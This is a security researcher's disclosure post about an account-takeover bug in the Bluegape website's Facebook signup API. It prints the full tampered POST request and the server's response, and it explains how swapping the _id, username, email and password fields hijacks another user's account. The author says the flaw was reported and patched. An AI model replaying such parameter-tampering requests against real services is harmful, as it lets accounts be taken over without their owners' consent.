Naresh LamGade
Naresh LamGadeSo, while making a signup on the website through the social media ( Facebook ) I found that lot of requested were being made on the site regarding the registered user from Facebook like names, profile link , fb profile image, username, password, accessToken, Gender, email etc.
so just for a fun I changed all info to Mark Zuckerberg information and it was all accepting and then I suddenly went to the site and saw that username field is disabled and I was unable to make it then I went back to the request and change the username to “zuck” and it was like boom it worked. Then I saw there was another parameter _id but it was encrypted so I just created another account and got it’s id and replaced the info and I was able to take over another account.
Here’s the request :
POST /auth/signup HTTP/1.1
Host: publicapi5.bluegape.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:40.0) Gecko/20100101
Firefox/40.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json;charset=utf-8
Referer: http://bluegape.com/
Content-Length: 611
Origin: http://bluegape.com
Cookie: _ga=GA1.2.1308041597.1441653308; _gat=1
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
{"fullName":"Nirmal Tamang","firstName":"Nirmal","lastName":"Tamang","facebook":
{"id":"10101640953722381","accessToken":"[removed]","profileUrl":"https://www.faceb
ook.com/app_scoped_user_id/809814902389523/"},"email":"[email protected]","gender"
:"male","avatar":"https://graph.facebook.com/809814902389523/picture?
width=400","_id":"55c8bf5e0c8b3cdceb794e70","bluegape":
{"username":"nirmaltamang1","password":"nepal@123"}}
Response :
Response :
{"success":true,"data":{"token":"removed","user":
{"_id":"55c8bf5e0c8b3cdceb794e70","mysqlId":6220,"email":"[email protected]","full
Name":"Nirmal Tamang","firstName":"Nirmal","bluegape":
{"username":"nirmaltamang1","password":"d0691c8a12ee2656d49229c5c25a656848168fb5"},
"created":"2015-10-
03T20:03:16.502Z","slug":"nirmaltamang1","cover":"http://cdn.bluegape.com/wp-
content/uploads/2015/02/16182601/wallhaven-113377.jpg","google
so, I just have to change the email,username and password of the _id and his/her account could be access with my new credential. 🙂 You might be thinking it’s hard to find the user id since it is encrypted but it’s easy to find the user id of any user just by visiting their profile.
So, if we just replace the user id to this Maruti id and give it a new email and username then we can take over this account just by making a API request.
Here’s is the video POC :
Bluegape Vulnerability : Hacking Any bluegape Account from Naresh LamGade on Vimeo.
I reported this bug to the bluegape team and they approved as this was a bug but they didn’t respond me after that. They made a patch but didn’t even emailed me about it. I was hoping for some good bounty as it was quite big and popular website.
Last time when I reported the XXS on their site they awarded me small bounty but now when the bug was critical they didn’t respond me. It would be fine if they could have told me and thanked me for the issue. I am really really disappointed with the bluegape.
Naresh LamGade